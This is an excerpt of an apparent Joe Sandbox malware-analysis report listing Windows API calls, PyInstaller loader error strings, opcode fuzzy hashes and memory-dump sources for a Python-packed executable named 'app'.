                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                            • Opcode ID: ccd96fa709924df0f3163e071325977cdadda225d23be4b42b5a526fd017ca04
                                                                                                                                                                                                            • Instruction ID: 593627fda9dab8f558f792bd231727e4e0d85f49fb528d0963f37c8082c8414b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd96fa709924df0f3163e071325977cdadda225d23be4b42b5a526fd017ca04
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A418131A0E7C2A6EA24FB11E5006AAF3A0EF44795FC64431DE4D67B65EE3CE442C760

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE83B80: GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                            • SetDllDirectoryW.KERNEL32 ref: 00007FF7ACE83885
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: GetEnvironmentVariableW.KERNEL32(00007FF7ACE836C7), ref: 00007FF7ACE869AA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE86970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7ACE869C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                            • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                            • API String ID: 2344891160-3602715111
                                                                                                                                                                                                            • Opcode ID: 2ef5a63f544a7674e0c756e3ee58beae799b4e42eae2fb0ceef727c84f68c8fa
                                                                                                                                                                                                            • Instruction ID: 6459782b4f997882763a611c0427ed71f68e65b52eb2cd9f457faef7723bcbdc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ef5a63f544a7674e0c756e3ee58beae799b4e42eae2fb0ceef727c84f68c8fa
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7B1B331A1E6C365FE60BB25DA512BEB290BF40786FC64031E94D676F6EE2CE504C760

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                            • String ID: 1.2.12$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                            • API String ID: 2030045667-1282086711
                                                                                                                                                                                                            • Opcode ID: 0cf0d40fcd6668befe088b4bb6862fe5dbf3c5322c70cb13d3896b4c1b0e65d4
                                                                                                                                                                                                            • Instruction ID: 8b557977b753fb909f089ed40b161a4988453b1268fb2e32596d7bc0b018bedb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf0d40fcd6668befe088b4bb6862fe5dbf3c5322c70cb13d3896b4c1b0e65d4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51E332A0E6C2A5EA60BB11E5403BAB2A0BB80795FC64135ED4DA37A5EF3CE445C750

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4170891091-0

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285465088.00007FF8A7EA1000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8A7EA0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ea0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Unicode_$LibrarySize$Arg_CharDeallocErr_ErrorFormatFreeLastLoadObject_ParseTuple_Wide_strdup
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2194358736-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285465088.00007FF8A7EA1000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FF8A7EA0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ea0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$DeallocDict_FromItemUnicode_
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2460041365-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
                                                                                                                                                                                                            • Instruction ID: fbf80394fc03612bad376d471496813a6d3cccc3fca5e8568ee1b65ace1a1466
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A251D731B0E2C296EA64BF25960067AF191BF44BA5F964631EE6D537E5CF3CE4408720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B580
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7ACE9B6CD), ref: 00007FF7ACE9B58A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                            • Opcode ID: 9f733d69f420b8b04d1076dad759c709488f53e52c8dcc29dc1aedb5cdeb4cec
                                                                                                                                                                                                            • Instruction ID: b236e0acb1143df32565c910cc485c5510d102f6c2de4b6e2855251ae603b22e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f733d69f420b8b04d1076dad759c709488f53e52c8dcc29dc1aedb5cdeb4cec
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B11EF72A1DB8191DB20AB25A404069E362AB45FF4F950731EE7E277F8CF3CD0148700
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948DF
                                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE947C1), ref: 00007FF7ACE948F5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                                            • Opcode ID: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction ID: 6205ec6df0a70a499e3491a645bc1f50fae3bde877d72fe25803a1ac692541d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3187d087db2b214abcb8657b9371278066060ab850da1b3f30db97418e55af6d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F11A33260D74292EB64AF14A40113AF7A0FB85771F911235FA9EA59F8EF3CD014CB20
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FC6
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE99DD5,?,?,00000000,00007FF7ACE99E8A), ref: 00007FF7ACE99FD0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseErrorHandleLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 918212764-0
                                                                                                                                                                                                            • Opcode ID: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction ID: f212e00d94b546897feb5dbb36810383f54acc7c504cc42195d00a107fbcb905
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9e98b412a5961d7460aa12ad0ec3afb474dab09b1a01e5b31658786db65771
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21A431F1E64261FA90B725948127DD6929F447A0F8A42B5F92F673F1CE6CE8454320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 4ee447531585d2975da1dcda293718dbcf43dcc67f1dbe5b8b161bd0b0a82fe6
                                                                                                                                                                                                            • Instruction ID: 502f9ef47861c96b455c7ba7470b68fe3d803cfc4eef2d7cb42edda025b797f2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ee447531585d2975da1dcda293718dbcf43dcc67f1dbe5b8b161bd0b0a82fe6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A541E33291E24197EA34EB29A44027DF3A0EB55B80F910571EB8EA36A1CF6DE502C761
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7ACE8309E), ref: 00007FF7ACE87143
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2592636585-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF7ACE9A7E6,?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E), ref: 00007FF7ACE9DCC5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction ID: 336b29164cc2f0936125791fc1be451abe7c01209f9269399e311732448441cb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 706319e4b74843d5ad32e6c0b7fb19fe3c01a362d6ca9e09dab64425b174a517
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BF04970B0F31661FE54B66198503B8D6806F49B80F8E4470E90EFA3B1EEACE6908230
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF7ACE8FD74,?,?,?,00007FF7ACE91286,?,?,?,?,?,00007FF7ACE92879), ref: 00007FF7ACE9CA3A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                            • Opcode ID: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction ID: ebfe9ee3236785c6688cc4bdd14591d709b8394d160fcda48212b523ced5d4e0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 489c3d0cd44d140bc65b640a77535ff6cb9a2f4134c0d54aac00f59d377539c0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF05E30B0F38665FE64B6B15850278D1805F447E1F8A0670EC2FB53F2DEACE4409130
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PyMem_Malloc.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF34B1
                                                                                                                                                                                                            • PyErr_NoMemory.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF34C4
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFE4D0: PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE4E5
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFE4D0: PyEval_RestoreThread.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE52A
                                                                                                                                                                                                              • Part of subcall function 00007FF8A7FFE4D0: PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,?,00007FF8A7FF349A), ref: 00007FF8A7FFE54A
                                                                                                                                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF34D7
                                                                                                                                                                                                            • PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3529
                                                                                                                                                                                                            • PyErr_SetString.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3AFD
                                                                                                                                                                                                            • _Py_Dealloc.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B16
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B54
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B62
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3B80
                                                                                                                                                                                                            • PyMem_Free.PYTHON38(?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?,?,?,00007FF8A7FF3139), ref: 00007FF8A7FF3BA0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$Stringfree$Eval_Mem_Thread$DeallocFreeMallocMemoryRestoreSavememset
                                                                                                                                                                                                            • String ID: could not determine decompressed size of item %zd$could not initialize zstd thread pool$data is NULL$error decompressing item %zd: %s$error decompressing item %zd: decompressed %zu bytes; expected %zu$offset in segments overflows buffer size$segments is NULL$unable to reference prepared dictionary: %s$unhandled error type: %d; this is a bug
                                                                                                                                                                                                            • API String ID: 2695198502-2304803683
                                                                                                                                                                                                            • Opcode ID: 6ee584b960c72b28866ff726247a192d9fd16a8f0ad5eda4915495846f521d5d
                                                                                                                                                                                                            • Instruction ID: c77c399dca6d865db5ad49acecaedebb18834894b566ad2bdc6ee4230f2527b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ee584b960c72b28866ff726247a192d9fd16a8f0ad5eda4915495846f521d5d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE229922A0AA86A1EE698F29E8503BD73A4FF95BC4F144232CE4D53795DF7CE191D310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                                                            • API String ID: 2446303242-1601438679
                                                                                                                                                                                                            • Opcode ID: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction ID: 495748766eb145c82c20611f05ccf26b03c7e39802db9555aae69d9cf8f09550
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 051afb74dd6d8b2a6ec501d8fa5556287ab5d0c90ea366ccf65a0a970d90b360
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33A17A32209B819BE7149F11E5847AEB370F788B81F914129EB8D23B24CF7DE569CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
